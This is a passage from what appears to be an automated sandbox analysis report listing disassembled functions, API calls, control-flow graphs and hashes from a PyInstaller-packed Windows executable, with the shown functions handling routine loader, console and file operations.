                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                              • API String ID: 740614611-1339014028
                                                              • Opcode ID: e203fb9b2ed022230aea9b70073d79c64569b0fcacf7335b186391ffe1e7d089
                                                              • Instruction ID: 3fab048a01c5c4017447e2a7546bf2296505fa9d9af4630f50572a24fffc5199
                                                              • Opcode Fuzzy Hash: e203fb9b2ed022230aea9b70073d79c64569b0fcacf7335b186391ffe1e7d089
                                                              • Instruction Fuzzy Hash: 1D411515E0A64380FB24EB61A9652B91291AF8DBC8F441131EE2DD7BF6FE2CF5088340
                                                              Function 00007FF6FB1FAD6C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 572 7ff6fb1fad6c-7ff6fb1fad92 573 7ff6fb1fad94-7ff6fb1fada8 call 7ff6fb1f43d4 call 7ff6fb1f43f4 572->573 574 7ff6fb1fadad-7ff6fb1fadb1 572->574 588 7ff6fb1fb19e 573->588 575 7ff6fb1fb187-7ff6fb1fb193 call 7ff6fb1f43d4 call 7ff6fb1f43f4 574->575 576 7ff6fb1fadb7-7ff6fb1fadbe 574->576 595 7ff6fb1fb199 call 7ff6fb1f9bf0 575->595 576->575 579 7ff6fb1fadc4-7ff6fb1fadf2 576->579 579->575 582 7ff6fb1fadf8-7ff6fb1fadff 579->582 585 7ff6fb1fae01-7ff6fb1fae13 call 7ff6fb1f43d4 call 7ff6fb1f43f4 582->585 586 7ff6fb1fae18-7ff6fb1fae1b 582->586 585->595 591 7ff6fb1fb183-7ff6fb1fb185 586->591 592 7ff6fb1fae21-7ff6fb1fae27 586->592 593 7ff6fb1fb1a1-7ff6fb1fb1b8 588->593 591->593 592->591 596 7ff6fb1fae2d-7ff6fb1fae30 592->596 595->588 596->585 599 7ff6fb1fae32-7ff6fb1fae57 596->599 600 7ff6fb1fae8a-7ff6fb1fae91 599->600 601 7ff6fb1fae59-7ff6fb1fae5b 599->601 605 7ff6fb1fae93-7ff6fb1faebb call 7ff6fb1fc90c call 7ff6fb1f9c58 * 2 600->605 606 7ff6fb1fae66-7ff6fb1fae7d call 7ff6fb1f43d4 call 7ff6fb1f43f4 call 7ff6fb1f9bf0 600->606 603 7ff6fb1fae82-7ff6fb1fae88 601->603 604 7ff6fb1fae5d-7ff6fb1fae64 601->604 608 7ff6fb1faf08-7ff6fb1faf1f 603->608 604->603 604->606 633 7ff6fb1faebd-7ff6fb1faed3 call 7ff6fb1f43f4 call 7ff6fb1f43d4 605->633 634 7ff6fb1faed8-7ff6fb1faf03 call 7ff6fb1fb594 605->634 637 7ff6fb1fb010 606->637 611 7ff6fb1faf21-7ff6fb1faf29 608->611 612 7ff6fb1faf9a-7ff6fb1fafa4 call 7ff6fb202c2c 608->612 611->612 616 7ff6fb1faf2b-7ff6fb1faf2d 611->616 624 7ff6fb1fb02e 612->624 625 7ff6fb1fafaa-7ff6fb1fafbf 612->625 616->612 620 7ff6fb1faf2f-7ff6fb1faf45 616->620 620->612 626 7ff6fb1faf47-7ff6fb1faf53 620->626 628 7ff6fb1fb033-7ff6fb1fb053 ReadFile 624->628 625->624 630 7ff6fb1fafc1-7ff6fb1fafd3 GetConsoleMode 625->630 626->612 631 7ff6fb1faf55-7ff6fb1faf57 626->631 635 7ff6fb1fb14d-7ff6fb1fb156 GetLastError 628->635 636 7ff6fb1fb059-7ff6fb1fb061 628->636 630->624 638 7ff6fb1fafd5-7ff6fb1fafdd 630->638 631->612 632 7ff6fb1faf59-7ff6fb1faf71 631->632 632->612 639 7ff6fb1faf73-7ff6fb1faf7f 632->639 633->637 634->608 644 7ff6fb1fb173-7ff6fb1fb176 635->644 645 7ff6fb1fb158-7ff6fb1fb16e call 7ff6fb1f43f4 call 7ff6fb1f43d4 635->645 636->635 641 7ff6fb1fb067 636->641 646 7ff6fb1fb013-7ff6fb1fb01d call 7ff6fb1f9c58 637->646 638->628 643 7ff6fb1fafdf-7ff6fb1fb001 ReadConsoleW 638->643 639->612 648 7ff6fb1faf81-7ff6fb1faf83 639->648 652 7ff6fb1fb06e-7ff6fb1fb083 641->652 654 7ff6fb1fb003 GetLastError 643->654 655 7ff6fb1fb022-7ff6fb1fb02c 643->655 649 7ff6fb1fb17c-7ff6fb1fb17e 644->649 650 7ff6fb1fb009-7ff6fb1fb00b call 7ff6fb1f4368 644->650 645->637 646->593 648->612 658 7ff6fb1faf85-7ff6fb1faf95 648->658 649->646 650->637 652->646 660 7ff6fb1fb085-7ff6fb1fb090 652->660 654->650 655->652 658->612 665 7ff6fb1fb092-7ff6fb1fb0ab call 7ff6fb1fa984 660->665 666 7ff6fb1fb0b7-7ff6fb1fb0bf 660->666 672 7ff6fb1fb0b0-7ff6fb1fb0b2 665->672 669 7ff6fb1fb0c1-7ff6fb1fb0d3 666->669 670 7ff6fb1fb13b-7ff6fb1fb148 call 7ff6fb1fa7c4 666->670 673 7ff6fb1fb0d5 669->673 674 7ff6fb1fb12e-7ff6fb1fb136 669->674 670->672 672->646 676 7ff6fb1fb0da-7ff6fb1fb0e1 673->676 674->646 677 7ff6fb1fb0e3-7ff6fb1fb0e7 676->677 678 7ff6fb1fb11d-7ff6fb1fb128 676->678 679 7ff6fb1fb103 677->679 680 7ff6fb1fb0e9-7ff6fb1fb0f0 677->680 678->674 682 7ff6fb1fb109-7ff6fb1fb119 679->682 680->679 681 7ff6fb1fb0f2-7ff6fb1fb0f6 680->681 681->679 683 7ff6fb1fb0f8-7ff6fb1fb101 681->683 682->676 684 7ff6fb1fb11b 682->684 683->682 684->674
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: f46020de842a52cafdde7105f07d1b6eb91271a1123fdb72a25b984c7f5050ec
                                                              • Instruction ID: f5e055fceffc53f5b794d61c64e7a08555c6d169ef99cdab7ceb5876c17f195e
                                                              • Opcode Fuzzy Hash: f46020de842a52cafdde7105f07d1b6eb91271a1123fdb72a25b984c7f5050ec
                                                              • Instruction Fuzzy Hash: 85C1F226E1C68791EB61DB15A4403BE37A1FB98B88F550131DA6E877F1EE7CE855C300
                                                              Function 00007FF6FB1E7B50 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                              • String ID:
                                                              • API String ID: 995526605-0
                                                              • Opcode ID: 62e4819b0c80cd137060bb94e6a3fe70b8e549ab62dcd95e051829f5e08db428
                                                              • Instruction ID: 9f68bda16038fa0af6870d5dab42bb87e4d3b2bb3bba1e13ac5367b6b9894744
                                                              • Opcode Fuzzy Hash: 62e4819b0c80cd137060bb94e6a3fe70b8e549ab62dcd95e051829f5e08db428
                                                              • Instruction Fuzzy Hash: 9D212125E0CA4341EB209B55F59427EA3A5EB897A8F140235EA7DC3AF4EF6CE4498700
                                                              Function 00007FF6FB1E33E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,00007FF6FB1E3534), ref: 00007FF6FB1E3411
                                                                • Part of subcall function 00007FF6FB1E29E0: GetLastError.KERNEL32(?,?,?,00007FF6FB1E342E,?,00007FF6FB1E3534), ref: 00007FF6FB1E2A14
                                                                • Part of subcall function 00007FF6FB1E29E0: FormatMessageW.KERNEL32(?,?,?,00007FF6FB1E342E), ref: 00007FF6FB1E2A7D
                                                                • Part of subcall function 00007FF6FB1E29E0: MessageBoxW.USER32 ref: 00007FF6FB1E2ACF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message$ErrorFileFormatLastModuleName
                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                              • API String ID: 517058245-2863816727
                                                              • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                              • Instruction ID: 1d8c0df6fd8a5ef8bde1ecc7c3af3fead7223a4fc5fc9a714621c32a0e5ca254
                                                              • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                              • Instruction Fuzzy Hash: 89213D61F1864391FB26EB24E9513BE5290AF4C398F801236E67DC69F5FE2CE5048710
                                                              Function 00007FF6FB1E8400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00007FF6FB1E7B50: GetCurrentProcess.KERNEL32 ref: 00007FF6FB1E7B70
                                                                • Part of subcall function 00007FF6FB1E7B50: OpenProcessToken.ADVAPI32 ref: 00007FF6FB1E7B83
                                                                • Part of subcall function 00007FF6FB1E7B50: GetTokenInformation.KERNELBASE ref: 00007FF6FB1E7BA8
                                                                • Part of subcall function 00007FF6FB1E7B50: GetLastError.KERNEL32 ref: 00007FF6FB1E7BB2
                                                                • Part of subcall function 00007FF6FB1E7B50: GetTokenInformation.KERNELBASE ref: 00007FF6FB1E7BF2
                                                                • Part of subcall function 00007FF6FB1E7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6FB1E7C0E
                                                                • Part of subcall function 00007FF6FB1E7B50: CloseHandle.KERNEL32 ref: 00007FF6FB1E7C26
                                                              • LocalFree.KERNEL32(?,00007FF6FB1E3814), ref: 00007FF6FB1E848C
                                                              • LocalFree.KERNEL32(?,00007FF6FB1E3814), ref: 00007FF6FB1E8495
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                              • API String ID: 6828938-1529539262
                                                              • Opcode ID: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
                                                              • Instruction ID: 8bfa06a4851e46ac826007bb199eff448da766d6db3e1cf6c0b06b7998118862
                                                              • Opcode Fuzzy Hash: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
                                                              • Instruction Fuzzy Hash: 64212B21E0864381E710EB10E5253FE62A5FB8D784F845435EA6DC3BE6EE3CE545C790
                                                              Function 00007FF6FB1FC270 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 819 7ff6fb1fc270-7ff6fb1fc295 820 7ff6fb1fc563 819->820 821 7ff6fb1fc29b-7ff6fb1fc29e 819->821 822 7ff6fb1fc565-7ff6fb1fc575 820->822 823 7ff6fb1fc2a0-7ff6fb1fc2d2 call 7ff6fb1f9b24 821->823 824 7ff6fb1fc2d7-7ff6fb1fc303 821->824 823->822 826 7ff6fb1fc305-7ff6fb1fc30c 824->826 827 7ff6fb1fc30e-7ff6fb1fc314 824->827 826->823 826->827 829 7ff6fb1fc324-7ff6fb1fc339 call 7ff6fb202c2c 827->829 830 7ff6fb1fc316-7ff6fb1fc31f call 7ff6fb1fb630 827->830 834 7ff6fb1fc453-7ff6fb1fc45c 829->834 835 7ff6fb1fc33f-7ff6fb1fc348 829->835 830->829 837 7ff6fb1fc4b0-7ff6fb1fc4d5 WriteFile 834->837 838 7ff6fb1fc45e-7ff6fb1fc464 834->838 835->834 836 7ff6fb1fc34e-7ff6fb1fc352 835->836 841 7ff6fb1fc354-7ff6fb1fc35c call 7ff6fb1f3ae0 836->841 842 7ff6fb1fc363-7ff6fb1fc36e 836->842 843 7ff6fb1fc4e0 837->843 844 7ff6fb1fc4d7-7ff6fb1fc4dd GetLastError 837->844 839 7ff6fb1fc49c-7ff6fb1fc4ae call 7ff6fb1fbd28 838->839 840 7ff6fb1fc466-7ff6fb1fc469 838->840 867 7ff6fb1fc440-7ff6fb1fc447 839->867 845 7ff6fb1fc46b-7ff6fb1fc46e 840->845 846 7ff6fb1fc488-7ff6fb1fc49a call 7ff6fb1fbf48 840->846 841->842 848 7ff6fb1fc370-7ff6fb1fc379 842->848 849 7ff6fb1fc37f-7ff6fb1fc394 GetConsoleMode 842->849 851 7ff6fb1fc4e3 843->851 844->843 852 7ff6fb1fc4f4-7ff6fb1fc4fe 845->852 853 7ff6fb1fc474-7ff6fb1fc486 call 7ff6fb1fbe2c 845->853 846->867 848->834 848->849 856 7ff6fb1fc44c 849->856 857 7ff6fb1fc39a-7ff6fb1fc3a0 849->857 859 7ff6fb1fc4e8 851->859 861 7ff6fb1fc500-7ff6fb1fc505 852->861 862 7ff6fb1fc55c-7ff6fb1fc561 852->862 853->867 856->834 865 7ff6fb1fc429-7ff6fb1fc43b call 7ff6fb1fb8b0 857->865 866 7ff6fb1fc3a6-7ff6fb1fc3a9 857->866 860 7ff6fb1fc4ed 859->860 860->852 868 7ff6fb1fc533-7ff6fb1fc53d 861->868 869 7ff6fb1fc507-7ff6fb1fc50a 861->869 862->822 865->867 872 7ff6fb1fc3b4-7ff6fb1fc3c2 866->872 873 7ff6fb1fc3ab-7ff6fb1fc3ae 866->873 867->859 876 7ff6fb1fc544-7ff6fb1fc553 868->876 877 7ff6fb1fc53f-7ff6fb1fc542 868->877 874 7ff6fb1fc523-7ff6fb1fc52e call 7ff6fb1f43b0 869->874 875 7ff6fb1fc50c-7ff6fb1fc51b 869->875 878 7ff6fb1fc3c4 872->878 879 7ff6fb1fc420-7ff6fb1fc424 872->879 873->860 873->872 874->868 875->874 876->862 877->820 877->876 881 7ff6fb1fc3c8-7ff6fb1fc3df call 7ff6fb202cf8 878->881 879->851 885 7ff6fb1fc3e1-7ff6fb1fc3ed 881->885 886 7ff6fb1fc417-7ff6fb1fc41d GetLastError 881->886 887 7ff6fb1fc3ef-7ff6fb1fc401 call 7ff6fb202cf8 885->887 888 7ff6fb1fc40c-7ff6fb1fc413 885->888 886->879 887->886 892 7ff6fb1fc403-7ff6fb1fc40a 887->892 888->879 890 7ff6fb1fc415 888->890 890->881 892->888
                                                              APIs
                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FB1FC25B), ref: 00007FF6FB1FC38C
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FB1FC25B), ref: 00007FF6FB1FC417
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode
                                                              • String ID:
                                                              • API String ID: 953036326-0
                                                              • Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                              • Instruction ID: a7dbcbc1e1f74e19b309d2fcd1c6570bcd3f85d178627569dfc7b3fa630c83f6
                                                              • Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                              • Instruction Fuzzy Hash: ED91AF72F1865385F760DB69A4502BD2BA0BB48B8CF144139DE2EE6EE5EE38D441D700
                                                              Function 00007FF6FB1F4938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 1279662727-0
                                                              • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                              • Instruction ID: 476057493f5560489294b66ecdfc4e74d91cd70a192fcd2b2411a668e4bec7d9
                                                              • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                              • Instruction Fuzzy Hash: 29417122E1878343E754DB6195503796261FB9C7A8F109335E6AD83AE5FF6CA5F0C700
                                                              Function 00007FF6FB1EBF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 3251591375-0
                                                              • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                              • Instruction ID: 1944ed0c782d6a72df424f5b4e2c204f17b496fee78f094ca1a0ba810387238b
                                                              • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                              • Instruction Fuzzy Hash: 2A311A25E0824381FB64EB6899653BD1281AF4978CF440034EA7ECBEF3FE2CB9448611
                                                              Function 00007FF6FB1F8D48 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                              • Instruction ID: 07a2989078018d28b20d309ff3bd37894c9438233e6348d44e1c110bbb6e1a0a
                                                              • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                              • Instruction Fuzzy Hash: EBD06714F18607C6EB686B7059A917D12115F9CB85B102438D86BC63F3ED3CA8099350
                                                              Function 00007FF6FB1EF45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                              • Instruction ID: 1adbaf364a4a0024140f1d7681e4dac30bb370f42e2754074938bbb80f9a2542
                                                              • Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                              • Instruction Fuzzy Hash: 7B518062E0968346FB28DE26940067E6791AF8CBACF184634DD7D86BF5EF3CE441C610
                                                              Function 00007FF6FB1F9E68 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF6FB1F9CE5,?,?,00000000,00007FF6FB1F9D9A), ref: 00007FF6FB1F9ED6
                                                              • GetLastError.KERNEL32(?,?,?,00007FF6FB1F9CE5,?,?,00000000,00007FF6FB1F9D9A), ref: 00007FF6FB1F9EE0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseErrorFindLastNotification
                                                              • String ID:
                                                              • API String ID: 1687624791-0
                                                              • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                              • Instruction ID: a6cc17002dc50e9e85a16ba20153214398180aab3176f7972fe484a0553a904e
                                                              • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                              • Instruction Fuzzy Hash: 78215E21F1868341FB94E761A59437D26929F8CBE8F085235DA3EC76FAEE6CE445C300
                                                              Function 00007FF6FB1FB444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
